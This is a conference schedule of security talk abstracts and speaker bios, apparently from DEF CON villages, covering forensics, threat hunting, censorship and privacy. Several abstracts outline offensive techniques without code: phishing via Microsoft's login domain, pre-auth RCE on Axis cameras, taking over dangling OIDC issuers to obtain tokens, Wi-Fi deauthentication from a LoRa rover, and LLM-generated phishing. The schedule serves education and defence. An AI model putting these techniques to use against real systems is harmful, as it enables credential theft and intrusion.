I will cover the tools available in the corporate network, the limitations of remote investigations, and the signatures of threat actors. All examples are cases I have actively worked in the past two years. This will range from the individual threat- timecard fraud identified thru network logs which led to the geolocation of an automated fingerprint device hidden in a facility to large numbers of contractors working in denied areas to ultimately the identification and mitigation of North Korean IT worker fraud within the network. 1. Speaker intro and brief background 1. On-site contractor must be on site daily between 9-5 but there was little work. They connected an older generation iPhone to the visitor network and hid it within a box in a cubicle away from foot traffic. 1. The device had the timecard app for $company which required a manual fingerprint touch/swipe geolocated to the customer site daily. 2. The contractor automated a device to have a synthetic flesh covering over a robotic finger which would press log in at 0900 and logout at 5pm monday-friday 3. The device was discovered by janitors and assumed to be an explosive device at first 4. Picture analysis revealed the make/model of the iPhone 5. I gained access to the visitor Wifi logs, found the MAC address of the iPhone/device name (named $contractor name) and the traffic going to the contractor timesheet website Other devices were also found with similar configurations for the user and his manager 2.How I was introduced to the IoT village thru chip off extraction of Chinese voting machine in 2022 by the IOT experts Description of voting machine prototype from china 4g connectivity, bluetooth, wifi but no true data ports for analysis Chip off extraction by IoT village (videos) end result of the analysis and where the images went for national security 3. North Korean IT Fraudulent worker hunting 1. Micro level- piKVM switch hunting on individual network detection level, now turned to an email alert via date ubea 2. Hints and clues via digital forensics- devices added to the workstation that are not related to the users 1. Kim’s iPhones connecting to George’s virtual machine 2. Multiple user devices (verified thru MAC address) connecting to the same workstation 3. Timecards being updated in HR systems in beijing/NK time zone on emulators 1. Can see it’s a linux device android phone whereas most legitimate users are either android or iPhone. Connecting to Wifi VPN router for all connections and forgetting 2fa is tied to the local infrastructure 4. User was being terminated from company A as a fraudulent worker and company B/C screens were in the background. With the screen shot time provided by our partner, I executed a windows event code search in splunk for devices locked within the window of the termination from company A. We ultimately found a full stack dev fitting the description of NKIT suspects with an Astrill VPN. While hunting for this user, we identified one working out of China and spoofing their location. The humint interview, while far from the iOt arena, revealed the user’s deception as they would not open the windows locally to prove they are in the same geographic time zone
SpeakerBio: Will Bagget, Operation Safe EscapeWill Baggett is a Lead Investigator for Digital Forensics and Insider Threat at a Fiscal Infrastructure organization. He is also Director of Digital Forensics at Operation Safe Escape (volunteer role), a non-profit organization providing assistance to victims of domestic abuse.
- ics Calendar file
Cybersecurity is currently in a state of crisis, and it is imperative that we confront this issue head-on. The increasing aggressiveness and sophistication of adversaries is not the primary concern; rather, our approach to tackling these threats is a significant part of the problem. In the realm of defending against cyberattacks, it is not the probabilities that count, but rather the actions we take. Many well-known cybersecurity tools from both large enterprises and startups often fail to deliver on their promises or provide misleading, if not outright fraudulent, data. The notion that vendors frequently misrepresent their capabilities is, as the saying goes, "a tale as old as time." However, the idea that these vendors may be so convincing because they genuinely believe in their own fabrications is particularly thought-provoking. In this discussion, we will delve into the realities surrounding cybersecurity vendors, certifications, and a range of other contentious topics within the cyber domain. If you’re ready for a honest look at the state of cyber, this session is for you.
SpeakerBio: Louis DeweaverDr. Louis DeWeaver serves as a Cyber Security Consultant at Marsh McLennan Agency (MMA), bringing over two decades of experience to the role. He earned an Associate of Applied Science degree in Information Technology and Computer Network Systems, followed by a Bachelor of Science degree in Information Systems Security in 2011. In 2016, he enhanced his qualifications by obtaining a Master of Science degree in Information Assurance, focusing on Cybersecurity. Most recently, in 2021, he completed his academic journey with a Doctor of Computer Science degree, also specializing in Cybersecurity.
- ics Calendar file
Fixing security bugs is part of a dev’s job, but it can also be a one-way ticket to dependency hell because 95% of upgrades have the potential to cause breaking changes! In this lottery inspired game, you’ll play the odds to see how many vulnerabilities you can eliminate (and get back to writing code) without breaking the application.
SpeakerBio: Jenn Gile
- ics Calendar file
TheTimeMachine is an offensive OSINT and bug bounty recon suite that revives forgotten endpoints from the past using the Wayback Machine. Designed for red teamers, CTF players, and bounty hunters, it automates historical data mining, subdomain extraction, parameter harvesting, and endpoint fuzzing for vulnerabilities like XSS, open redirect, LFI, and SQLi. The suite also integrates a powerful JWT analysis engine to extract, decode, and highlight juicy fields from tokens hidden in archived URLs. TheTimeMachine also hunts leaked archives and even verifies whether archived snapshots are still live. With colorful terminal output, modular CLI tools, and support for custom wordlists, this tool resurrects the buried past to exploit the forgotten future. Dead links don’t die here—they just get reconned harder.
Speakers:Arjun "T3R4_KAAL" Chaudhary,Anmol "Fr13nd0x7f" K. SachanArjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.
SpeakerBio: Anmol "Fr13nd0x7f" K. SachanAnmol is a security consultant at NetSPI with expertise in web, API, AI/ML, and network penetration testing as well as attack surface management and offensive security automation. He has reported to over 50 organizations via VDPs, discovered multiple CVEs, and co-founded cybersecurity communities like CIA Conference and OWASP Chandigarh. He is also an active open-source contributor — his tools like WayBackLister, ThreatTracer, The Time Machine, and more have collectively earned over 600 GitHub stars. He is passionate about red teaming and building tools that enhance real-world security assessments.
- ics Calendar file
The accelerating evolution of technology, specifically AI, has created a "meta-system" so complex and intertwined with all domains of knowledge and human life that it effectively operates on a meta-level, shaping our reality and exceeding our control. The meta-system requires collaboration among all of its parts for effect management. We need to think on a meta-level because the meta-system is thinking about us in its own unique terms. We must adopt a "hacker" mindset – thinking critically, creatively, collaboratively, and systematically – to navigate this new reality.
SpeakerBio: Richard "neuralcowboy" ThiemeRichard Thieme who has published numerous articles and short stories, thirteen books, and has delivered hundreds of speeches. His recent Mobius Trilogy illuminates the impacts of security and intelligence work on practitioners. The trilogy was lauded by a 20-year CIA veteran as one of the five best works of serious spy fiction--ever. He spoke in 2022 at Def Con - which he is an uber-contributor-for the 26th year and keynoted the first two Black Hats. He has keynoted security conferences in 15 countries and clients range from GE, Microsoft, Medtronic, Bank of America, Allstate Insurance, and Johnson Controls to the NSA, FBI, US Dept of the Treasury. Los Alamos National Lab, the Pentagon Security Forum, and the US Secret Service.
- ics Calendar file
Detection and response are essential pillars of cybersecurity—but what if something slips through the cracks? Not every attack triggers an alert. That’s where Threat Hunting comes in.
Threat hunting is a proactive, human-driven approach to uncovering signs of compromise that automated systems may have missed or misunderstood. It involves asking deeper questions, forming hypotheses, and exploring system behavior to find evidence of stealthy or novel attacks.
Join us for an introductory presentation on Threat Hunting, where you'll learn how cybersecurity professionals go beyond known threats to uncover hidden adversaries—and why human intuition is still a critical part of modern defense.
SpeakerBio: KainuWith over 18 years of experience in IT and cybersecurity, Kainu currently specializes in Digital Forensics, Incident Response (DFIR), and Threat Hunting, with over 5 years dedicated to actively defending against threats, leading response efforts, and conducting deep forensic investigations. He has worked across diverse industries including healthcare, pharmaceutical, manufacturing, legal, and financial sectors, helping organizations detect, contain, and recover from complex security incidents. By day, he serves as an Incident Response case manager and consultant, conducting investigations, leading threat hunts, or mentoring clients on how to build and run effective incident response teams. He brings a hands-on, analytical approach to defending infrastructure and uncovering adversary tradecraft. Outside of work, Kainu is a passionate locksport practitioner and a proud #GirlDad, driven by curiosity, resilience, and a commitment to protecting what matters most.
- ics Calendar file
This presentation aims to provide an actionable strategy to connect theoretical threat modelling frameworks and practical cloud implementations. We analyze why legacy approaches do not work for cloud-native applications, particularly microservices and serverless architectures.
We will explore how to: • establish a realistic threat modelling schedule which provides real value lowering the risk of handling threat modelling as just a "tick-the-box" activity; • create effective cloud architecture diagrams to make it understandable and handy for developers to brainstorm possible threats; • implement effective system decomposition strategy to get rid of the monolithic threat modelling which fails for distributed cloud systems. We will demonstrate how this decomposition enables a targeted application of the STRIDE model, highlighting cloud-specific threat vectors and nuances, such as those arising in cross-tenant scenarios; • adapt DREAD risk evaluation framework for the cloud; • effectively engage stakeholders across development, security, and operations; • use AI as a starting point in threat modelling (demo included) and understand where human expertise remains critical. We will make sure attendees gain a clear understanding of why traditional threat modelling is insufficient for modern cloud environments and will leave with a practical framework and techniques they can immediately apply to their own cloud deployments, improving their organization's security posture and reducing cloud-related risks.
Speakers:Hanna Papirna,Emma Yuan FangHanna is a cybersecurity expert and consultant specialising in securing cloud environments for clients in various industries such as financial services, commercial banking, and retail. With the experience in Secure Landing Zones, Infrastructure as Code, identity management, endpoint protection, security operations, and DevOps, she helps organizations to build resilient cybersecurity strategies and roadmaps.
As a certified Microsoft Trainer, she conducts hands-on workshops on cloud and cybersecurity topics, empowering teams to navigate modern security challenges. Passionate about Cloud Security Posture Management and robust defenses against evolving threats.
SpeakerBio: Emma Yuan Fang, Senior Security Architect at EPAMEmma is a Senior Security Architect at EPAM, specialising in developing and executing security strategies and architecting cloud solutions. With over 10 years of experience in cyber, she has led projects and technical workshops focused on cloud transformation and cloud-native application development. Beyond her professional role, Emma is dedicated to advocate for a more diverse cyber workforce through community volunteering and public speaking. She is a passionate mentor, volunteers at the leadership team of WiCyS UK&I affiliate, Google's Techmakers ambassador, and serves as a member of Industry Advisory Board at the University of Buckingham in the UK.
- ics Calendar file
Backblaze Drive Stats is an open dataset that has tracked hard drive and SSD reliability across our data centers since 2013. This session covers recent backend upgrades—including a modular versioning system and migration to Snowflake with Trino and Iceberg—that improved data processing and failure validation. We'll also share updated AFR trends by drive model and size, SSD tracking challenges, and share how drive insights have underpinned performance improvements in data centers.
Speakers:Pat Patterson,Stephanie DoylePat Patterson is the chief technical evangelist at Backblaze. Over his three decades in the industry, Pat has built software and communities at Sun Microsystems, Salesforce, StreamSets, and Citrix. In his role at Backblaze, he creates and delivers content tailored to the needs of the hands-on technical professional, acts as the “voice of the developer” on the Product team, and actively participates in the wider technical community. Outside the office, Pat runs far, having completed ultramarathons up to the 50 mile distance. Catch up with Pat via Bluesky or LinkedIn.
SpeakerBio: Stephanie Doyle, Associate Editor & Writer at BackblazeStephanie is the Associate Editor & Writer at Backblaze. She specializes in taking complex topics and writing relatable, engaging, and user-friendly content. You can most often find her reading in public places, and can connect with her on LinkedIn.
- ics Calendar file
This presentation explores the evolving landscape of Android application security testing as artificial intelligence becomes increasingly integrated into mobile devices. The talk bridges traditional penetration testing methodologies with emerging AI-specific security challenges, providing practitioners with updated frameworks and tools for comprehensive Android security assessments.
SpeakerBio: Gabrielle BotbolGabrielle Botbol is a Pentester at the largest financial cooperative in North america. With a deep focus on the banking industry, Gabrielle specializes in exploring AI, mobile applications and API.
Gabrielle is an avid blog writer who advocates for access to education for all. In addition, she has a large following on social media, where she shares many educational resources about technical training and many other cyber topics.
She actively contributes to various organizations as a member of their Advisory Board and technical board. She is a speaker and trainer at global events and prestigious universities, like RSAC, Blackhat, Defcon, CUNY, University of Toronto and many more …
With her contributions to the community, Gabrielle has been the recipient of multiple prestigious awards. Among them, she was honored as one of the Top 20 women in cybersecurity in Canada, Woman Hacker of the Year by CSWY, Educator of the Year at AYA, Top Influencer in Cybersecurity by IFSEC Global, and Pentest Ninja at WSCJ.
- ics Calendar file
AntiCistamines, Antiboyotics, or Proboyotics: meet, connect, and celebrate with the trans and gender-diverse people of our community!
- ics Calendar file
When the first measurement studies of the GFW came out in the early 2000s, computation and power consumption were 30,000X greater than they are today. Because of this, China’s GFW resided deeper in the network and further away from homes and data centers. The substantial increase in computational efficiency has made processing and filtering in-path and near connection end-points viable while the volume of network traffic in today’s Internet has made this design a virtual necessity. Russia’s censorship apparatus, the TSPU, has emerged as a state-of-the-art system, on par with the GFW, and a potentially more significant threat, particularly for users of Russian apps and data centers. There are two reasons for this. First, Russia’s design, which places censors in-path and closer to end-hosts (residential modems and data center connections), permits more granular, targeted attacks. Second, according to the Russian government, sanctions have compelled them to build their own certificate authority and require all Russian software to trust this certificate authority. Combining these two factors implies major threats to users interacting with Russian data centers and software. Fortunately, research has identified cases where the TSPU can be circumvented. New tools based on these ideas could be the future of circumvention.
References:
Censorship of VPNs today, link
SpeakerBio: Benjamin "bmixonbaca" Mixon-BacaI am a security researcher focused on Internet Freedom, censorship circumvention, and pwning middleboxes, firewalls, and other devices that are supposed to keep me "safe". I have developed attacks against VPN software. The one relevant to this presentation is CVE-2021-3773. This vulnerability affects VPNs but is actually because of issues in the firewall/connection tracking framework (e.g., Netfilter) of the underlying OS running the VPN. An attacker can use this vulnerability to redirect packets in various ways and can even let an attacker escalate from adjacent to-in-path between the victim and VPN server. I applied insights I gained while developing this attack to testing the TSPU and was able to develop bypass strategies. This is because the underlying design of connection tracking frameworks, such as how they track TCP states and direction, is basically the same for both network layer VPNs like OpenVPN and WireGuard and firewalls like the TSPU.
- ics Calendar file
- ics Calendar file
What are the consequences if an adversary compromises the surveillance cameras of thousands of leading Western organizations and companies? As trust in Chinese-made IoT devices declines, organizations face limited alternatives—especially in video surveillance. Many governments have already banned Dahua and Hikvision products in sensitive facilities, further narrowing their choices. This concern drove our research, revealing that surveillance platforms can be double-edged swords.
We focused on Axis Communications, a major player in video surveillance widely used by U.S. government agencies, schools, medical facilities, and Fortune 500 companies.
In our talk, we will present an in-depth analysis of the Axis.Remoting communication protocol, uncovering critical vulnerabilities that allow attackers to achieve pre-auth RCE on Axis platforms. This access could serve as a gateway into an organization’s internal network via its surveillance infrastructure. Additionally, we identified a novel technique for passive data exfiltration, enabling attackers to map organizations using this equipment—potentially aiding in targeted attacks.
SpeakerBio: Noam MosheNoam Moshe is a vulnerability researcher and Team Lead at Claroty Team82. Noam specializes in vulnerability research, web applications pentesting, malware analysis, network forensics and ICS/SCADA security. In addition, Noam presented in well-known Hacking conferences like Blackhat/Defcon, as well as won Master of Pwn at Pwn2Own Miami 2023
- ics Calendar file
Microsoft Entra ID – one of the most used identity providers in the enterprise market. Or from our perspective: the most targeted platform in phishing attacks. Getting our phishing infrastructure up and running is usually the easy part. The real challenge is often keeping it online long enough to deliver the phishing link and collect credentials without detection before it gets burned.
But what if we could use Microsoft's official login domain for our phishing purposes? And no, I'm not talking about the heavily mitigated OAuth Consent or Device Code Phishing techniques, or simply hosting a phishing page on Azure Web App subdomains. I'm talking about stealing credentials directly from the legitimate login.microsoftonline.com domain.
In this talk, I will share multiple novel methods that can be used to achieve this. And the best of all? It all relies on legitimate functionality, making it mostly unpatchable. 😈
References:
SpeakerBio: Keanu "RedByte" Nys, SpotitKeanu Nys (aka RedByte) is an information security researcher from Belgium, and currently leads spotit's offensive security team. While he has a passion for all offensive cybersecurity topics, he mostly specializes in Active Directory, Microsoft Entra ID (Azure AD), and Social Engineering.
He is the author of the Microsoft 365 and Entra attack toolkit GraphSpy. Additionally, Keanu is the trainer for the Certified Azure Red Team Expert (CARTE) bootcamps at Altered Security, and has presented at hacker conferences such as BruCON.
He has presented at security conferences such as BruCon, and is the author of the Microsoft 365 and Entra attacking toolkit GraphSpy. He is an instructor for various Azure Red Teaming courses with Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/
- ics Calendar file
Federated Credentials are one of the ways to authenticate workload identities and provide access to resources using Open ID Connect (OIDC), and major identity providers such as Entra ID (formerly known as Azure AD) support authentication using federated credentials. Developers set up a trust relationship between federated identity providers and workload identities. Often times due to a misconfiguration or lack of understanding of federated credentials security risks, developers have dangling domains configured as issuer in the setup. Due to the inherent trust relationship configured with the federated identity provider, an attacker can take over the dangling issuer domain, host OIDC discovery endpoints and obtain access tokens to elevate privileges.
This talk aims to highlight the risks of dangling issuers and demonstrates how an attacker can exploit them to elevate privileges. In addition, the talk also covers mitigations and best practices and provides tools to identify these misconfigurations. The demos used in this session leverage Microsoft Entra ID as the identity provider and Azure as the cloud hosting platform. However, the key takeaways are generic and are applicable to other cloud environments and identity providers.
Key concepts covered in the talk are as follows: 1. Introduction a. Speaker intro b. Overview of federated credentials in Entra ID (Azure AD) & other identity providers 2. Federated Credentials 101 in Entra Id (Azure AD) a. Legitimate use case: i. Federated credentials setup ii. How do workload identities authenticate with federated credentials?
Dangling Issuers in federated credentials a. What causes the dangling issuers in federated credentials?
How can an attacker abuse dangling Issuers? a. Pre-requisites for the attack scenario b. Dangling Issuer domain take over, host OIDC discovery metadata & steps to obtain access tokens c. Use tokens to access resources
How to identify dangling Issuers in federated credentials? a. Provide guidance to identify dangling issuers using Graph APIs
Mitigations & best practices a. How to prevent dangling issuers? b. Tenant level policies to prevent token issuance from untrusted issuers
Future work a. Research on other identity provider Federated Credentials
Gautam Peri is a Senior Security Engineer in EPSF SERPENT (Service Pentest) team at Microsoft. He has over 9 years of experience as a security professional in multiple organizations including Microsoft and Citibank N.A. He started his career as a software developer and became a security professional. Currently, Gautam focuses on securing Azure Edge & Platform and Windows & Devices services at Microsoft. He is passionate about identifying vulnerabilities at scale. Gautam presented a workshop at DEF CON 32 and a speaker at OWASP BASC (Boston Application Security Conference) 2024. Gautam holds CISSP & GCPN certifications, he is committed to continuous learning and development and drives internal knowledge share events.
- ics Calendar file
Cookies, small data files stored on a user’s device by websites they visit, are commonly used for various purposes across different functionalities. Developers utilize cookies to maintain session information and personalize content; Marketing teams use cookies to track user behavior and create targeted advertising campaigns; Analytics teams rely on cookies to measure website performance and user engagement.
Cookies and trackers have been in the face of organizations and customers since the announcement of GDPR and similar privacy regulations. Disclosure and user consent for cookies are now required, and everyone has become more aware and thoughtful of trackers. Large companies like Apple and Google are also moving toward deprecating third-party trackers. Eventually, every company and organization will have to address the privacy concerns of cookies and trackers.
We at Sentry started early and chose the hard path to remove all non-essential cookies and trackers from our public-facing sites. This project has been challenging since there are few examples to learn from and resources for this approach are limited. We encountered many unexpected difficulties and a lack of existing solutions that could help or guide us through the process. I want to share our experience, along with the tools we use, so that anyone who wants to do the same doesn’t have to go through all the hassles like we did, and to encourage others to do the same by removing their cookies and trackers too.
SpeakerBio: Jeff Hung, Senior Security Engineer at Sentry.ioJeff Hung, Senior Security Engineer at Sentry.io, experienced in corporate security and specializes in clicking the correct buttons in various security tools. Hosted the first Mandarin Cybersecurity podcast InfosecDecompress.
- ics Calendar file
The Unmanned Wireless Penetration Testing Device is a modular, open-source system enabling remote wireless security assessments. Using long-range LoRa communication, a mobile rover can perform Wi-Fi reconnaissance, deauthentication attacks, Bluetooth device discovery, and image capture without requiring proximity to the target network. Controlled entirely via encrypted LoRa packets, the system is optimized for secure operations in remote or inaccessible environments. Attendees will see live demonstrations of wireless attacks issued over LoRa and learn how the system can be adapted for mobile and drone-based security operations. Source code and build instructions will be freely available under an open license.
Speakers:Ayaan Qayyum,Omar HamoudehAyaan is a Master of Science student in electrical engineering at Columbia University. His research interests include mobile computing, applied machine learning, edge AI, digital signal processing, mathematical modeling, and information systems. He completed his undergraduate studies at Rutgers University–New Brunswick, earning a Bachelor of Science in electrical and computer engineering with a minor in mathematics. His technical background spans embedded systems, wireless communication, and hardware security, with certifications in AWS AI and cloud technologies. He has published research across cybersecurity, FPGA systems, and machine learning, including a project on FPGA fast Fourier transform implementation and a machine learning-based stock forecasting model. His work has been recognized at academic conferences such as the IEEE Integrated STEM Education Conference and the Rutgers JJ Slade Research Symposium. He is currently a technical research intern at the Intelligent and Connected Systems Laboratory at Columbia University. He was a program mentor for the Governor's School of New Jersey designing search-and-rescue drone systems utilizing real-time edge inference. He is passionate about building scalable, open-source security tools and bridging the gap between theory and real-world deployment.
SpeakerBio: Omar HamoudehOmar is a wireless security enthusiast and builder who recently completed his B.S. in electrical and computer engineering at Rutgers University. His work focuses on embedded systems security, hardware hacking, and wireless exploitation. As part of a senior design project, he developed an unmanned wireless penetration testing rover using LoRa for remote Wi-Fi scanning and reconnaissance. The project earned second place at the 2025 Rutgers ECE Capstone Expo. He also worked extensively on secure architecture projects, including implementing TrustZone on an ARM-based microcontroller to separate secure and non-secure execution environments. In a separate project, he designed a lightweight firmware validation system to detect unauthorized modifications in IoT devices. His current research centers on building low-profile tools for wireless network exploitation and resilience testing.
- ics Calendar file
Dr. Elie Bursztein is Google & DeepMind AI Cybersecurity technical and research lead. His research focuses on creating novel AI-powered cybersecurity capabilities and ensuring AI remains safe and secure for all. His work is regularly featured in major news outlets, including the Wall Street Journal, CBS, Forbes, Wired, the Huffington Post, and CNN. Elie authored over 60 academic publications for which he has received more than ten best paper awards. He has given dozens of talks at premier industry conferences and received multiple industry awards, including a Black Hat Pwnie award. He is the founder of the Etteilla Foundation, the leading non-profit organization dedicated to preserving and promoting the rich cultural heritage of playing cards and is a tarot history expert. Beret aficionado, Elie tweets at @elie, and performs magic tricks in his spare time. Born and raised in Paris, he received an engineering degree from EPITA and then a Ph.D. from ENS-cachan before completing a postdoc at Stanford University. Elie joined Google in 2011, DeepMind in 2023, and now lives with his wife in Mountain View, California.
- ics Calendar file
Apple Intelligence, Apple's latest AI-powered tools is integrated across its devices, is designed to enhance user productivity, privacy, and convenience. However, like any advanced technology, it carries the potential for misuse in the realm of cybercrime. Malicious actors could exploit features such as AI-generated content, personal data summarization, or automated decision-making to craft more convincing phishing attacks, create deepfake audio or messages mimicking trusted contacts, or extract sensitive information from stolen devices more efficiently. Additionally, if vulnerabilities in Apple Intelligence are discovered, attackers could potentially hijack its functionalities for surveillance, data theft, or unauthorized access. This talk covers the digital evidence available to investigators to uncover the malicious use of Apple Intelligence.
Speakers:Neumann "scsideath" Lim,Jugal Patel,Stephanie Corvese,Debasis ParidaNeumann Lim has a strong background in cybersecurity and infrastructure management currently leading the Odlum Brown Team. He also has an extensive IR experience at previous companies such as Deloitte Canada, EY, CGI, and ISA. Currently, Neumann is serving in advisory board roles at SANS, EC-Council and other organizations. Neumann’s expertise includes digital forensics, incident response, modernizing infrastructure, infrastructure resilience, site reliability, malware research, pentesting and leadership in information security policies. Outside of corporate life, Neumann is the co-founder of Malware Village, judge and participant of various cyber CTFs. Neumann is often seen speaking or leading workshops at various conferences such as DEFCON, BlueTeamVillage, GrayhatCon, BSides, Toronto CISO Summit, CCTX, HTCIA, IACIS.
SpeakerBio: Jugal Patel
- ics Calendar file
How do we become more efficient and effective as ICS/OT defenders? Or as ICS/OT penetration testers? How do we use ChatGPT and other GenAI to quickly and easily create both offensive and defensive tools for ICS/OT? After a quick peek at the basics covered in our previous "episode," we'll jump into other aspects of using ChatGPT to not only hack ICS/OT assets, but to also make our lives easier as defenders. Ultimately, we become more effecient and more effective at protecting our environments from ANY type of intruder.
- ics Calendar file
Twenty‑four months ago we presented the Black Hat talk "Evil Digital Twin" in which we demonstrated how large language models (LLMs) could readily exploit the cognitive vulnerabilities of users, and that humans would perceive AI as sentient long before true artificial general intelligence emerge. Join us for this two‑hour workshop as we walk you through the basic architecture of human digital twins (HDTs), trained on the core patterns of human individuals, may be deployed to simulate both the targets of social engineering attacks or operate as high-fidelity honey pots. We also explore a coming future of persistent cognitive cyber‑warfare, escalating as the cost of deception approaches zero and the attack surface shifts from networks to minds. Audience members will interact with SCOTOBOT (a human digital twin of a Supreme Court Justice), meet a perfect AI assistant for insider threat, and leave with a NIST research‑based LLM that speaks in phishing emails.
SpeakerBio: Matthew Canham, Executive Director at Cognitive Security InstituteDr. Matthew Canham is the Executive Director of the Cognitive Security Institute and a former Supervisory Special Agent with the Federal Bureau of Investigation (FBI), he has a combined twenty-one years of experience in conducting research in cognitive security and human-technology integration. He currently holds an affiliated faculty appointment with George Mason University, where his research focuses on the cognitive factors in synthetic media social engineering and online influence campaigns. He was previously a research professor with the University of Central Florida, School of Modeling, Simulation, and Training’s Behavioral Cybersecurity program.
His work has been funded by NIST (National Institute of Standards and Technology), DARPA (Defense Advanced Research Projects Agency), and the US Army Research Institute. He has provided cognitive security awareness training to the NASA Kennedy Space Center, DARPA, MIT, US Army DevCom, the NATO Cognitive Warfare Working Group, the Voting and Misinformation Villages at DefCon, and the Black Hat USA security conference. He holds a PhD in Cognition, Perception, and Cognitive Neuroscience from the University of California, Santa Barbara, and SANS certifications in mobile device analysis (GMOB), security auditing of wireless networks (GAWN), digital forensic examination (GCFE), and GIAC Security Essentials (GSEC).
- ics Calendar file
We Ain't came to lose!
At DEFCon 31 Veilid was revealed to the world as a part of the Bovine Resurrection, we generated press coverage worldwide, and managed to drag the window over on how the press talked about digital privacy. Now we come to the Crypto and Privacy Village to spread the good word of the future restored, how we can seize the means of computation, and HOW YOU CAN HELP. We'll talk about the whys and hows of the Veilid Framework, and what this new combined technology stack means for restoring the future we were promised.
We'll be covering the fundamentals of Veilid, as well as talking about progress made and the apps that have been released on our framework.
Speakers:Paul Miller,Katelyn BowdenPaul Miller is the founder/leader/community organizer of hackers.town, Projekt:ONI (Optimistic Nihilists Inc.) organizer and founder, Hacker, Infosec professional, and is a passionate privacy advocate. Paul has worked to show the ways a centralized internet has harmed our culture and the future. He believes you should always be N00bin', and that collectively we can restore the promise of the future the internet once offered us.
SpeakerBio: Katelyn BowdenKatelyn Bowden is a hacker, activist, and CULT OF THE DEAD COW member, who embraces the human side of hacking and tech. Katelyn has dedicated her life to changing the world for the positive- between her work fighting Non-consensual pornography, and her dedication to educating users on security, she is dedicated to making the internet a safer place for everyone. Her alignment is chaotic good, with a hard emphasis on the chaos. She also creates strange furby art and has over 60 dead things on display in her house.
- ics Calendar file
DEF CON is renowned for bringing together some of the brightest minds in technology and security. By participating in VETCON, you have the chance to highlight the critical role veterans play in this landscape and explore how technology can support and enhance their lives.
- ics Calendar file
Voice cloning technology has advanced significantly, enabling the creation of convincing voice replicas using consumer-grade devices and publicly available tools. This poses critical challenges to aviation communication, where trust between pilots and air traffic controllers is paramount. The reliance on AM radio, with its low fidelity and lack of authentication, exacerbates the risk of fraudulent communications. This talk examines trust factors within aviation's air traffic control system, focusing on how air traffic controllers' voices can be cloned and where planes are most at risk. The talk explores FCC enforcement techniques for locating malicious actors, historical perspectives on alternative radio technologies, and the secondary systems pilots employ during communication failures. Simulated attacks will demonstrate how these vulnerabilities could disrupt operations, particularly at critical points such as runway crossings and in low-visibility conditions.
To mitigate these risks, this talk evaluates existing safeguards, including the Traffic Collision Avoidance System (TCAS), and discusses emerging technologies such as stop bars and guided runway lighting.
References:
Andrew Logan is an audio engineer, independent aviation journalist and developer @HelicoptersofDC who presented Tracking Military Ghost Helicopters over Washington DC at Def Con 30. Since then his advocacy urging lawmakers to review ADS-B exemptions for government aircraft has been cited by the Senate in the wake of the Flight 5342 crash.
- ics Calendar file
- ics Calendar file
Hands-on access to real voting systems
- ics Calendar file
Put your skills to the test in this challenge and try to find all the vulnerabilities in the code. We have a wide range of challenges, from easy to advanced in various languages. Can you find them all?
Speakers:Darren Meyer,Raphael SilvaDarren is a security research advocate and practitioner that has worked on every side of the AppSec world at some point in the past 20 years. He's passionate about making security work more accessible and less stressful.
SpeakerBio: Raphael SilvaRaphael Silva is a Security Researcher at Checkmarx, specializing in security research, SAST methodologies, and Supply Chain Security. Over the course of his career, he has presented at various conferences, as well as conducted a workshop at DEFCON30. In addition, he is experienced in vulnerability analysis, research, and disclosure, having reported multiple bugs to companies and open-source projects.
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
